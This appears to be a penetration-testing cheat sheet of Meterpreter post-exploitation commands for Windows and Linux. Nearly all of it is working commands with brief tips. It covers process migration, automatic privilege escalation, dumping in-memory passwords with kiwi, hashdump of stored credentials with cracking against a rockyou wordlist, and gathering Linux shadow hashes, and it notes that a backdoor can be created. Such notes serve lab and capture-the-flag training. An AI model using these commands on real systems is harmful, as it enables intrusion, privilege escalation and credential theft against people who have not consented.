Meterpreter exploitation commands
- β‘οΈ See if you are root and your privileges
meterpreter> getuid
Windows: NT AUTHORITY\SYSTEM
- β‘οΈ Learn more about the system. Here with Windows, you could look for CVEs given the build version. The architecture can help too, as some scripts are less useful on some architectures.
meterpreter> sysinfo
Computer : XXX-PC
OS : Windows X (... Build xxx...).
Architecture : x64
- β‘οΈ Start a shell:
sh/bashon Linux,cmdon Windows
meterpreter> shell # start a shell
C:\WINDOWS\system32> # Windows cmd
- β‘οΈ Ask for suggested exploits. β οΈ Before running them, migrate to a stable process with the highest privilege you can have.
meterpreter> run post/multi/recon/local_exploit_suggester
- β‘οΈ Load a local file
commands.txtwith meterpreter commands
meterpreter> resource commands.txt
- β‘οΈ π Migrate to another process π. This is something as some services/stuff need us to be "in" a process that has the same architecture, and the same permissions, that our target. Usually, any process run by "NT AUTHORITY\SYSTEM"/root should be okay, although you may have to try a few times.
meterpreter> ps # list process
meterpreter> migrate process_pid # move to another process
meterpreter> migrate -N process_name # same
meterpreter> # most used ones
meterpreter> migrate -N spoolsv.exe # can restart so good
meterpreter> migrate -N explorer.exe # screenshots...
Windows commands
- β‘οΈ See your privileges
meterpreter> getprivs
- β‘οΈ Try automatic privilege escalation π (more information).
meterpreter> getsystem
- β‘οΈ Load PowerShell
meterpreter> load powershell
meterpreter> powershell_shell
PS>
- β‘οΈ Dump in-memory passwords
meterpreter> load kiwi
meterpreter> migrate some_process_nt_system_compatible
meterpreter> creds_all # retrieve all credentials
meterpreter> # you can also create a backdoor...
- β‘ | οΈ
root. Dump every credential stored by the system. Passwords must be cracked/dehashed. You can use a hash to login.
meterpreter> hashdump
# You may try to crack them using john within the msfconsole
msf6 exploit('module_used')> use auxiliary/analyze/crack_windows
msf6 exploit('module_used')> set CUSTOM_WORDLIST /usr/share/wordlists/rockyou.txt
msf6 exploit('module_used')> run
Linux commands
- β‘οΈ Start a shell
meterpreter> shell
$
- β‘ | οΈ
root. Dump every credential stored by the system. Passwords must be cracked/dehashed. You can use a hash to login.
# basically, all that to do: "cat /etc/shadow"
meterpreter> bg
msf6 exploit('module_used')> use post/linux/gather/hashdump
msf6 exploit('module_used')> set SESSION 1
msf6 exploit('module_used')> run